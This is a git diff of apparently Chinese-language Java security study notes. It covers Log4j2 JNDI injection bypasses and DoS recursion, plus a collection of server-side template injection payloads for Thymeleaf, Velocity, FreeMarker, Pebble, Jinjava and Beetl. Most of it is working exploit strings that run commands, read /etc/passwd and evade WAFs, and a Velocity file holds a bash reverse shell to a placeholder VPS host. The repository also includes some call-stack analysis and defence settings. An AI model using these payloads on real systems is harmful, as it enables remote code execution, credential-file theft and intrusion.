+>https://mp.weixin.qq.com/s?__biz=MzIxNDAyNjQwNg==&mid=2456098698&idx=1&sn=8c66b476cb303bdf413337bc5c92e127&chksm=803c6643b74bef55d1606a424e555ef09e27b8736928acdca027332453c6d9e4d7a11d7e589d&mpshare=1&scene=23&srcid=1215Twk8iymC8x9gXD72dMTK&sharer_sharetime=1639550097318&sharer_shareid=20feca07eb3065d70e5194c2cdd097b3#rd +> +>https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg + +## 信息泄露 + +信息泄露这个问题我在漏洞刚刚出来的那天晚上就想到了,只是对比rce,信息泄露就微不足道。因为log4j2支持很多协议 sys等等可以看到env等等这些的信息,然后通过dns带出来。 + +不过值得说一下其中有一个思路通过ResourceBundleLookup类去获得读取项目中后缀为properties的配置文件,其中就可能有username/password。当时我是看到了只是不知道这个方法是干啥子的也没有去百度。。。哭死了。 + +https://mp.weixin.qq.com/s?__biz=Mzg4OTExMjE2Mw==&mid=2247483945&idx=1&sn=b15b68d95da83bb20f1b3496396f823a&chksm=cff19125f88618338373a32f98be3d2a9497b464d6531658c2aa96f4872c23eed294441917b5&mpshare=1&scene=23&srcid=1211aS0Tghr1agBnBRlwwGTw&sharer_sharetime=1639232420884&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd + +https://www.cnblogs.com/jona-test/p/11399218.html + +更新 2021/12/24 + +看了大哥4ra1n的文章 https://xz.aliyun.com/t/10659 + +其中学习了dns(DNS协议是属于JNDI协议的) 可以带出数据 nc -lvup 通过udp接 + +![image](https://user-images.githubusercontent.com/63966847/147314294-222e4af5-98b3-4eac-863a-64316c775f91.png) + +然后就是回显的问题,通过报错来回显,其中port本该是int如果给它无法转int的字符串就会抛出这里的信息(触发RuntimeException),并且ignoreExceptions配置为false。触发RuntimeException() + +而NumberFormatException就是触发RuntimeException的子类。 + +${jndi:ldap://x.x.x.x:${java:version}/xxx} + +## bypass + +这个东西太多了,在tw一看就很多很多。一方面是因为一些协议可以返回输入的值比如:lower data + +还有一个bypass思路是因为执行解析log4j2中的${}问题。简单的说也是将${::-x}解析成x + +``` +${jn${::-d}i:ldap://127.0.0.1:8880/} +``` + +## cve-dos + +大哥成功获得apache的cve。https://xz.aliyun.com/t/10670 + +简单的看了一下发现里面的思路和我不一样,大哥是想到了网络连接,也就可以存在一个网络超时的问题,而且log4j2支持递归解析。。所以就让他一直解析网络超时的ip...造成dos. + +在这个cve通报中发现存在rce?简单的看了一下,我的理解是因为配置文件配置的这一次解析问题,如下配置中就有$${}这样。 + +``` + + + + %d %p %c{1.} [%t] $${ctx:loginId} %m%n + + + +``` + +而其中里面了ctx协议ContextMapLookup类,简单的说大概就是将我们解析的东西放到map里面然后在取出来。取出来之后在解析${xxxx}就造成了rce问题/dos问题。 + +## bypass 2.15 + +昨天在tw上看到了bypass 2.15版本,这个东西还没有具体去复现。不过看了一下exp大致懂了。。 + +``` +${jndi:ldap://127.0.0.1#evilhost.com:1389/exp} +``` + +不过环境要求比较严格而且真实环境的rce可能比较可能。。。 + +2021/12/20更新 + +今天看到了大哥写的bypass 2.15 rce分析简单的记录一下 https://xz.aliyun.com/t/10689 + +利用条件 + +1.开启lookup功能 + +2.macos系统 + +3.泛域名解析 + +4.本地存在gadget + +该exp通过去绕过了ip限制并且可以解析远程恶意ip(macos系统 + +``` +${jndi:ldap://127.0.0.1#evilhost.com:1389/exp} +``` + +然后去绕过ldap服务的限制。 + + +![image-20211220183446609](https://user-images.githubusercontent.com/63966847/146754506-bccfb16a-57e0-40d6-be17-36cbe67705a7.png) + + + +正常情况是直接通过Reference去利用,不过这里不能使用Reference,所以就利用deserializeObject,其实就是bypass jdk8u191。满足本地存在gadget。只是需要把classname换成基本数据类型。去绕过**if (!allowedClasses.contains(className))** + +也其实就是我们在了ldap的时候的思路 **LDAP服务攻击一般是先测Reference再测deserializeObject** + +![image-20211220183705875](https://user-images.githubusercontent.com/63966847/146754481-8d5aff45-fa12-4593-9165-ace4aa0257bd.png) + + + +## CVE-2021-45105 + +这个漏洞我看了下没有看太懂,也就不这么介绍了反正大概介绍递归解析的问题。 + +```java +${${::-${::-$${::-$}}}} +| +| +${::-${::-$${::-$}}} +然后在 this.substitute(event, bufName, 0, bufName.length()); +| +| +::-::-$${::-$} +然后在 this.substitute(event, bufName, 0, bufName.length()); +| +| +::-$${::-$} +| +| +${::-$} +| +| +::-$ 会进入一个异常 +``` +![image](https://user-images.githubusercontent.com/63966847/146945232-9157632d-2463-4d2c-976d-544e49ff249c.png) + + +~~说不定其他解析表达式也存在。。。。~~ + + +https://www.zerodayinitiative.com/blog/2021/12/17/cve-2021-45105-denial-of-service-via-uncontrolled-recursion-in-log4j-strsubstitutor + +https://github.com/apache/logging-log4j2/commit/806023265f8c905b2dd1d81fd2458f64b2ea0b5e#diff-3f056c67add25837df0d7d8b8ab22df492dc14e3c5bae5f2914e69ac8af8d5cc + +更新 2021/12/22 + +https://mp.weixin.qq.com/s?__biz=MzU5MjEzOTM3NA==&mid=2247490570&idx=1&sn=279f4c19c266dd2f443088e33786f867&chksm=fe25190bc952901d1a754f78802b3dd1fd1d3107cd0d92f54b62c64797e966962427ca989126&mpshare=1&scene=23&srcid=1222cs3lrxzG5cIJHSfdgcOe&sharer_sharetime=1640169352847&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd + + +``` +在配置文件中配置:$${ctx:apiVersion} 则输入 ${${ctx:apiVersion}}或${${::-${::-$${::-aaa}}}}则可以造成递归dos +在配置文件中配置:${ctx:apiVersion} 则输入${${::-${::-$${::-dos}}}}则可以造成递归dos +``` + +## 更新 + +cve:https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/ + +[聊聊配置文件 RCE 这件事](https://mp.weixin.qq.com/s?__biz=Mzg4MzYxODA4Mw==&mid=2247484028&idx=1&sn=5748c6b75530a786f1bf0622616413c6&chksm=cf45fa30f83273269da4884f82c5d4ce43089d6ba8a7b6470e35f963d690ec781faa85ab48e1&mpshare=1&scene=23&srcid=12298p7j6KLY39FVuwNzmFRD&sharer_sharetime=1640749370687&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + +不愧是师傅总结的不错,简单的说就是通过配置文件去rce. +突然又想到了一个:web.xml里面添加servlet去实现解析一句话。 +访问/exp路由就会解析 + +![image](https://user-images.githubusercontent.com/63966847/147626724-576ba23e-7fdf-4b73-b591-095af4578f8a.png) + +```xml + +xxx +/WEB-INF/1.jsp + + +xxx +/exp + +``` + + +## 总结一下 + +主要是自己的问题, + +第一点是读文档的习惯少导致不理解其中的意思失去第一时间拥有exp + +第二点是自己没有考虑到dos中的网络连接超时问题。 + +第三点是自己发现了ResourceBundleLookup类却不知道其意思导致失去新思路的发现。 + +(如果官方在删除lookup功能我相信还会有更多的漏洞。。。。。。。。 diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Beetl/exp.txt" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Beetl/exp.txt" new file mode 100644 index 0000000..7af8257 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Beetl/exp.txt" @@ -0,0 +1,11 @@ +http://ibeetl.com/beetlonline/ + +https://landgrey.me/blog/17/ + +JfinalCMS: https://xz.aliyun.com/t/8695 + +```java +${@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",@java.lang.Class.forName("java.lang.String")).invoke(@java.lang.Class.forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null),"ping 029bzv.dnslog.cn")} + + +``` diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" new file mode 100644 index 0000000..fd33fdb --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" @@ -0,0 +1,9 @@ +# FreeMarker + +读文件 +``` +[#assign ctx=springMacroRequestContext.webApplocationContext/] +[#assign url=ctx.getResource('file:///etc/passwd')/] +[#assign is = url.getInputStream()/] +[#list 1..url.contentLength() as i]${is.read()}[/#list] +``` diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/exp.txt" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/exp.txt" index 8239658..4834dcb 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/exp.txt" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/exp.txt" @@ -8,3 +8,7 @@ freemarker.template.utility#ObjectConstructor freemarker.template.utility#JythonRuntime <#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe") + +bypass +https://github.com/proudwind/javasec_study/blob/master/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-ssti.md +https://paper.seebug.org/1304/ diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" index 0fdbf81..cfc36e4 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" @@ -1,4 +1,483 @@ # java 模板注入 -+ [FreeMarker模板注入](FreeMarker) + +>https://github.com/lufeirider/BypassShell/blob/master/JAVA/JAVA.md +>https://gosecure.github.io/template-injection-workshop/#0 + + ++ [FreeMarker模板注入](FreeMarker) 后缀名.ftl + [Thymeleaf模板注入](Thymeleaf) **waero-ctf-2021-ideas-web 考察过** ++ [jsp模板注入](jsp) ++ [Velocity模板注入](Velocity) **2021 四川省比赛省赛非攻Java logiclogic** 后缀名.vm [wp](https://mp.weixin.qq.com/s?__biz=MzI3NDEzNzIxMg==&mid=2650481832&idx=2&sn=7b092fc6e26c7d5f131b8ef7a30dc85c&chksm=f3172dbbc460a4ad99f29b445dd92873304d7c34798f977695ba775a5096a6b707106190a09f&mpshare=1&scene=23&srcid=0924Bci6wWhHifB6Y7Cmc5hl&sharer_sharetime=1632452737857&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) ++ [beetl模板注入](Beetl) ++ [jfinalcms enjoy](jfinalcms_enjoy) **2021 字节ctf考察过。** ++ [Java FreeMarker 模板引擎注入深入分析](https://mp.weixin.qq.com/s/aYTp0suulfjQ5dcocS33Kg) +------------------------------------------------------------------------------------------------------------------------- +# SSTI + +>花费了一些时间整理 + +# SSTI + +## Thymeleaf + +> @panda 师傅已经分析的非常全面了,这里只是对自己学习做一个小总结。 + +Thymeleaf最后通过spel表达式进行代码执行的。 + +poc + +```java +__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("calc").getInputStream()).next()}__::.x +``` + +正常的调用栈(方便分析) + +``` +execute:138, Expression (org.thymeleaf.standard.expression) +preprocess:91, StandardExpressionPreprocessor (org.thymeleaf.standard.expression) +parseExpression:120, StandardExpressionParser (org.thymeleaf.standard.expression) +parseExpression:62, StandardExpressionParser (org.thymeleaf.standard.expression) +parseExpression:44, StandardExpressionParser (org.thymeleaf.standard.expression) +renderFragment:282, ThymeleafView (org.thymeleaf.spring5.view) +render:190, ThymeleafView (org.thymeleaf.spring5.view) +render:1400, DispatcherServlet (org.springframework.web.servlet) +processDispatchResult:1145, DispatcherServlet (org.springframework.web.servlet) +doDispatch:1084, DispatcherServlet (org.springframework.web.servlet) +doService:963, DispatcherServlet (org.springframework.web.servlet) +processRequest:1006, FrameworkServlet (org.springframework.web.servlet) +doGet:898, FrameworkServlet (org.springframework.web.servlet) +service:655, HttpServlet (javax.servlet.http) +service:883, FrameworkServlet (org.springframework.web.servlet) +service:764, HttpServlet (javax.servlet.http) +internalDoFilter:227, ApplicationFilterChain (org.apache.catalina.core) +doFilter:162, ApplicationFilterChain (org.apache.catalina.core) +doFilter:53, WsFilter (org.apache.tomcat.websocket.server) +internalDoFilter:189, ApplicationFilterChain (org.apache.catalina.core) +doFilter:162, ApplicationFilterChain (org.apache.catalina.core) +doFilterInternal:100, RequestContextFilter (org.springframework.web.filter) +doFilter:119, OncePerRequestFilter (org.springframework.web.filter) +internalDoFilter:189, ApplicationFilterChain (org.apache.catalina.core) +doFilter:162, ApplicationFilterChain (org.apache.catalina.core) +doFilterInternal:93, FormContentFilter (org.springframework.web.filter) +doFilter:119, OncePerRequestFilter (org.springframework.web.filter) +internalDoFilter:189, ApplicationFilterChain (org.apache.catalina.core) +doFilter:162, ApplicationFilterChain (org.apache.catalina.core) +doFilterInternal:201, CharacterEncodingFilter (org.springframework.web.filter) +doFilter:119, OncePerRequestFilter (org.springframework.web.filter) +internalDoFilter:189, ApplicationFilterChain (org.apache.catalina.core) +doFilter:162, ApplicationFilterChain (org.apache.catalina.core) +invoke:197, StandardWrapperValve (org.apache.catalina.core) +invoke:97, StandardContextValve (org.apache.catalina.core) +invoke:540, AuthenticatorBase (org.apache.catalina.authenticator) +invoke:135, StandardHostValve (org.apache.catalina.core) +invoke:92, ErrorReportValve (org.apache.catalina.valves) +invoke:78, StandardEngineValve (org.apache.catalina.core) +service:357, CoyoteAdapter (org.apache.catalina.connector) +service:382, Http11Processor (org.apache.coyote.http11) +process:65, AbstractProcessorLight (org.apache.coyote) +process:895, AbstractProtocol$ConnectionHandler (org.apache.coyote) +doRun:1722, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net) +run:49, SocketProcessorBase (org.apache.tomcat.util.net) +runWorker:1191, ThreadPoolExecutor (org.apache.tomcat.util.threads) +run:659, ThreadPoolExecutor$Worker (org.apache.tomcat.util.threads) +run:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads) +run:748, Thread (java.lang) +``` + +在**Thymeleaf3.0.12**版本中进行了防御,但是可以bypass + +```java +__${T%20(java.lang.Runtime).getRuntime().exec("calc")}__::.x +``` + +还需要说明一点。当 path 和返回的视图名⼀样的时候,需要使用**如下poc** + +![image](https://user-images.githubusercontent.com/63966847/143764895-5ea0f3b0-c89f-4f87-9974-a254365106a8.png) + + +```java +;/__${T%20(java.lang.runtime).getruntime().exec("calc")}__::.x +/__${T%20(java.lang.runtime).getruntime().exec("calc")}__::.x +``` + +原因说下图,在进行**parseExpression**之前做了一个**checkViewNameNotInRequest**操作 + +![image](https://user-images.githubusercontent.com/63966847/143764903-587e5808-3533-4aee-975f-d61135ed315b.png) + + + +所以在**Thymeleaf3.0.12**版本中直接return 视图名是不会触发的。 + +```java +@GetMapping("/path") +public String path(@RequestParam String lang) { + return lang; +} +``` + +### 修复: + +1. 设置ResponseBody注解 + +如果设置`ResponseBody`,则不再调用模板解析 + +2.设置redirect重定向 + +```java +@GetMapping("/safe/redirect") +public String redirect(@RequestParam String url) { + return "redirect:" + url; //CWE-601, as we can control the hostname in redirect + //forward: +``` + +根据spring boot定义,如果名称以**redirect:**开头,则不再调用**ThymeleafView**解析,调用**RedirectView**去解析controller的返回值 + +3.response + +```java +@GetMapping("/safe/doc/{document}") +public void getDocument(@PathVariable String document, HttpServletResponse response) { + log.info("Retrieving " + document); //FP +} +``` + +由于controller的参数被设置为HttpServletResponse,Spring认为它已经处理了HTTP Response,因此不会发生视图名称解析 + +## Velocity + +https://www.kancloud.cn/boshu/springboot/215859 + +https://cloud.tencent.com/developer/article/1771497 + +在springboot中超过1.5.x就不支持Velocity模板了,所以环境使用的是1.4.6.RELEASE + + + +目前来说Velocity模板利用是有难度的,需要修改其模板内容也就是修改原文件,然后在进行解析。可以参考**四川省比赛省赛非攻Java logiclogic** + + + +然后简单的调试一下Velocity模板的解析过程。 + +``` +execute:175, ASTMethod (org.apache.velocity.runtime.parser.node) +execute:280, ASTReference (org.apache.velocity.runtime.parser.node) +render:369, ASTReference (org.apache.velocity.runtime.parser.node) +render:342, SimpleNode (org.apache.velocity.runtime.parser.node) +merge:356, Template (org.apache.velocity) +merge:260, Template (org.apache.velocity) +mergeTemplate:519, VelocityView (org.springframework.web.servlet.view.velocity) +doRender:464, VelocityView (org.springframework.web.servlet.view.velocity) +renderMergedTemplateModel:294, VelocityView (org.springframework.web.servlet.view.velocity) +renderMergedOutputModel:167, AbstractTemplateView (org.springframework.web.servlet.view) +render:303, AbstractView (org.springframework.web.servlet.view) +render:1282, DispatcherServlet (org.springframework.web.servlet) +processDispatchResult:1037, DispatcherServlet (org.springframework.web.servlet) +doDispatch:980, DispatcherServlet (org.springframework.web.servlet) +doService:897, DispatcherServlet (org.springframework.web.servlet) +processRequest:970, FrameworkServlet (org.springframework.web.servlet) +doGet:861, FrameworkServlet (org.springframework.web.servlet) +service:635, HttpServlet (javax.servlet.http) +service:846, FrameworkServlet (org.springframework.web.servlet) +service:742, HttpServlet (javax.servlet.http) +internalDoFilter:230, ApplicationFilterChain (org.apache.catalina.core) +doFilter:165, ApplicationFilterChain (org.apache.catalina.core) +doFilter:52, WsFilter (org.apache.tomcat.websocket.server) +internalDoFilter:192, ApplicationFilterChain (org.apache.catalina.core) +doFilter:165, ApplicationFilterChain (org.apache.catalina.core) +doFilterInternal:99, RequestContextFilter (org.springframework.web.filter) +doFilter:107, OncePerRequestFilter (org.springframework.web.filter) +internalDoFilter:192, ApplicationFilterChain (org.apache.catalina.core) +doFilter:165, ApplicationFilterChain (org.apache.catalina.core) +doFilterInternal:105, HttpPutFormContentFilter (org.springframework.web.filter) +doFilter:107, OncePerRequestFilter (org.springframework.web.filter) +internalDoFilter:192, ApplicationFilterChain (org.apache.catalina.core) +doFilter:165, ApplicationFilterChain (org.apache.catalina.core) +doFilterInternal:81, HiddenHttpMethodFilter (org.springframework.web.filter) +doFilter:107, OncePerRequestFilter (org.springframework.web.filter) +internalDoFilter:192, ApplicationFilterChain (org.apache.catalina.core) +doFilter:165, ApplicationFilterChain (org.apache.catalina.core) +doFilterInternal:197, CharacterEncodingFilter (org.springframework.web.filter) +doFilter:107, OncePerRequestFilter (org.springframework.web.filter) +internalDoFilter:192, ApplicationFilterChain (org.apache.catalina.core) +doFilter:165, ApplicationFilterChain (org.apache.catalina.core) +invoke:198, StandardWrapperValve (org.apache.catalina.core) +invoke:96, StandardContextValve (org.apache.catalina.core) +invoke:478, AuthenticatorBase (org.apache.catalina.authenticator) +invoke:140, StandardHostValve (org.apache.catalina.core) +invoke:80, ErrorReportValve (org.apache.catalina.valves) +invoke:87, StandardEngineValve (org.apache.catalina.core) +service:341, CoyoteAdapter (org.apache.catalina.connector) +service:799, Http11Processor (org.apache.coyote.http11) +process:66, AbstractProcessorLight (org.apache.coyote) +process:861, AbstractProtocol$ConnectionHandler (org.apache.coyote) +doRun:1455, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net) +run:49, SocketProcessorBase (org.apache.tomcat.util.net) +runWorker:1149, ThreadPoolExecutor (java.util.concurrent) +run:624, ThreadPoolExecutor$Worker (java.util.concurrent) +run:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads) +run:748, Thread (java.lang) +``` + + + +在调用template#merge的时候渲染触发org.apache.velocity.runtime.parser.node.SimpleNode#render对其他节点进行渲染 + +![image](https://user-images.githubusercontent.com/63966847/143764912-04aa195c-a3fa-49d1-8689-9ffdb568883a.png) + +之后触发org.apache.velocity.runtime.parser.node.ASTReference#render + +![image](https://user-images.githubusercontent.com/63966847/143764917-7c8e1420-b40b-49d5-bbc5-24c35ca2b1f2.png) + +触发execute方法,之后通过反射去执行命令 + +![image](https://user-images.githubusercontent.com/63966847/143764918-1b6d2be5-64ae-400a-99b0-4dca7317ec2b.png) + +exp + +回显 + +```java +#set($x='')## +#set($rt=$x.class.forName('java.lang.Runtime'))## +#set($chr=$x.class.forName('java.lang.Character'))## +#set($str=$x.class.forName('java.lang.String'))## +#set($ex=$rt.getRuntime().exec('whoami'))## +$ex.waitFor() +#set($out=$ex.getInputStream())## +#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end +``` + + + +```java +#set($x='')$x.class.forName('java.lang.Runtime').getRuntime().exec('calc') +``` + +## Freemarker + +https://www.cnblogs.com/Eleven-Liu/p/12747908.html + +freemarker与velocity的攻击方式不太一样,freemarker可利用的点在于模版语法本身,直接渲染用户输入payload会被转码而失效,所以一般的利用场景为上传或者修改模版文件。 + +### poc + +```html +<#assign value="freemarker.template.utility.Execute"?new()> + ${value("calc.exe")} + + + <#assign value="freemarker.template.utility.ObjectConstructor"?new()> + ${value("java.lang.ProcessBuilder","calc.exe").start()} + + <#assign value="freemarker.template.utility.JythonRuntime"?new()> + <@value>import os;os.system("calc.exe") + +<#-- 回显 --> + <#assign ob="freemarker.template.utility.ObjectConstructor"?new()> + <#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("java.lang.ProcessBuilder","ifconfig").start().getInputStream())) > + <#list 1..10000 as t> + <#assign line=br.readLine()!"null"> + <#if line=="null"> + <#break> + + ${line} + ${"
"} + + +<#-- 读文件 --> + <#assign ob="freemarker.template.utility.ObjectConstructor"?new()> + <#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("java.io.FileInputStream","/etc/passwd"))) > + <#list 1..10000 as t> + <#assign line=br.readLine()!"null"> + <#if line=="null"> + <#break> + + ${line?html} + ${"
"} + + + <#assign is=object?api.class.getResourceAsStream("/etc/passwd")> + FILE:[<#list 0..999999999 as _> + <#assign byte=is.read()> + <#if byte == -1> + <#break> + + ${byte}, ] + + <#assign uri=object?api.class.getResource("/").toURI()> + <#assign input=uri?api.create("file:///etc/passwd").toURL().openConnection()> + <#assign is=input?api.getInputStream()> + FILE:[<#list 0..999999999 as _> + <#assign byte=is.read()> + <#if byte == -1> + <#break> + + ${byte}, ] + + <#assign classLoader=object?api.class.protectionDomain.classLoader> + <#assign clazz=classLoader.loadClass("ClassExposingGSON")> + <#assign field=clazz?api.getField("GSON")> + <#assign gson=field?api.get(null)> + <#assign ex=gson?api.fromJson("{}", classLoader.loadClass("freemarker.template.utility.Execute"))> + ${ex("calc")} + + <#assign optTemp = .get_optional_template('/etc/passwd')> + <#if optTemp.exists> + Template was found: + <@optTemp.include /> + <#else> + Template was missing. + + + <#include "/etc/passwd" parse=false> +``` + +将上面的payload写入到模版文件保存,然后让freemarker加载即可。 + +调用栈 + +``` +exec:84, Execute (freemarker.template.utility) +_eval:62, MethodCall (freemarker.core) +eval:101, Expression (freemarker.core) +calculateInterpolatedStringOrMarkup:100, DollarVariable (freemarker.core) +accept:63, DollarVariable (freemarker.core) +visit:347, Environment (freemarker.core) +visit:353, Environment (freemarker.core) +process:326, Environment (freemarker.core) +process:383, Template (freemarker.template) +main:44, TestFreeMarker (com.firebasky.freemarker) +``` + + + +### 防御 + +![image-20211125205404061](img/image-20211125205404061.png) + + + +```java +//不允许解析任何类。 +configuration.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER); + +//相同UNRESTRICTED_RESOLVER,不同是它不允许解析ObjectConstructor和Execute和freemarker.template.utility.JythonRuntime。 +configuration.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER); + +//只需调用ClassUtil.forName(String). +configuration.setNewBuiltinClassResolver(TemplateClassResolver.UNRESTRICTED_RESOLVER); +``` + +### bypass + +如果配置不当,依然会造成安全问题: + +https://xz.aliyun.com/t/4846 + +https://www.freebuf.com/articles/web/287319.html + +https://paper.seebug.org/1304/ + +## Pebble + +https://www.kumamon.fun/server-side-template-injection-on-the-example-of-pebble/ + +https://juejin.cn/post/6844904048483647495 + +exp + +``` +{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec("calc")%} +``` + +exp(Java 9+) + +``` +{% set cmd = 'id' %} +{% set bytes = (1).TYPE + .forName('java.lang.Runtime') + .methods[6] + .invoke(null,null) + .exec(cmd) + .inputStream + .readAllBytes() %} +{{ (1).TYPE + .forName('java.lang.String') + .constructors[0] + .newInstance(([bytes]).toArray()) }} +``` + +官方使用: + +https://pebbletemplates.io/wiki/guide/basic-usage/ + +尝试找一种jdk8的回显 exp ..... + +**目前只能这样** + +``` +{% set out = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec("whoami").inputStream %} +{{out.read()}}{{out.read()}}{{out.read()}}{{out.read()}}{{out.read()}}{{out.read()}}{{out.read()}}{{out.read()}}{{out.read()}} +``` + +更新 + +```java +{% set out = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec("whoami").inputStream %} +[{% for i in range(1,99) %}{% set byte = out.read() %}{{ byte }},{% endfor %}] +``` + +```python +a=[102,105,114,101,98,97,115,107,121,92,100,101,108,108,13,10,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1] +for i in a: + print(chr(i),end="") + if(i==-1): + exit() +``` + +调用栈 + +``` +exec:347, Runtime (java.lang) +invoke0:-1, NativeMethodAccessorImpl (sun.reflect) +invoke:62, NativeMethodAccessorImpl (sun.reflect) +invoke:43, DelegatingMethodAccessorImpl (sun.reflect) +invoke:498, Method (java.lang.reflect) +invokeMember:100, DefaultAttributeResolver (com.mitchellbosecke.pebble.attributes) +resolve:67, DefaultAttributeResolver (com.mitchellbosecke.pebble.attributes) +evaluate:82, GetAttributeExpression (com.mitchellbosecke.pebble.node.expression) +render:31, SetNode (com.mitchellbosecke.pebble.node) +render:43, BodyNode (com.mitchellbosecke.pebble.node) +render:30, RootNode (com.mitchellbosecke.pebble.node) +evaluate:144, PebbleTemplateImpl (com.mitchellbosecke.pebble.template) +evaluate:87, PebbleTemplateImpl (com.mitchellbosecke.pebble.template) +main:22, test (com.firebasky.pebble) +``` + +## Jinjava + +poc + +``` +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("")}} +``` + + + +```java +{{'a'.getClass().forName('java.lang.Runtime').methods[6].invoke(null).exec("calc")}} +``` + +try to find class object + +测试失败。。。 + +```java +{% set class = ____int3rpr3t3r____.getContext().getAllFunctions().toArray()[0].getMethod().getParameterTypes()[0] %} +{% set is = class.getResourceAsStream("/Foo.class") %} +{% for I in range(999) %} {% set byte = is.read() %} {{ byte }}, {% endfor %} +``` + +>https://securitylab.github.com/advisories/GHSL-2020-072-hubspot_jinjava/ diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" new file mode 100644 index 0000000..1f606b5 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" @@ -0,0 +1,8 @@ +# 绕过文章 + + ++ [记一次实战之若依SSTI注入绕过玄某盾](https://mp.weixin.qq.com/s/7TCZDkfCXlmEhcTb85fw_Q) + +```java +__${T%20(%0aRuntime%09).%0dgetRuntime%0a(%09)%0d.%00exec('calc')}__::.x +``` diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" new file mode 100644 index 0000000..9c7d898 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -0,0 +1,11 @@ +# 真实例子 + +Confluence CVE-2019-3396 + +Jira CVE-2019-11581 + +框架中的利用: + +https://xz.aliyun.com/t/11832 + +配合了fastjson 反序列化生成对象之后调用方法 diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" new file mode 100644 index 0000000..2879893 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" @@ -0,0 +1,14 @@ +$bizBean.class.class.forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec("/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/VPS-IP/VPS-PORT<&1") + + +#set($e="e") +${e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")} + +回显 +#set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) +#set($chr=$x.class.forName('java.lang.Character')) +#set($str=$x.class.forName('java.lang.String')) +#set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() +#set($out=$ex.getInputStream()) +#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read())) +#end diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/pom.xml" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/pom.xml" new file mode 100644 index 0000000..427f4f6 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/pom.xml" @@ -0,0 +1,11 @@ + + + org.apache.velocity + velocity + 1.7 + + + org.apache.velocity + velocity-tools + 2.0 + diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/exp.txt" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/exp.txt" new file mode 100644 index 0000000..b6940db --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/exp.txt" @@ -0,0 +1,17 @@ +https://p1n93r.github.io/post/code_audit/jfinal_enjoy_template_engine%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/ + +https://www.bookstack.cn/read/jfinal-4.8/09006a00d50c23b5.md + + +#include("../log/jfinal-blog.log") + 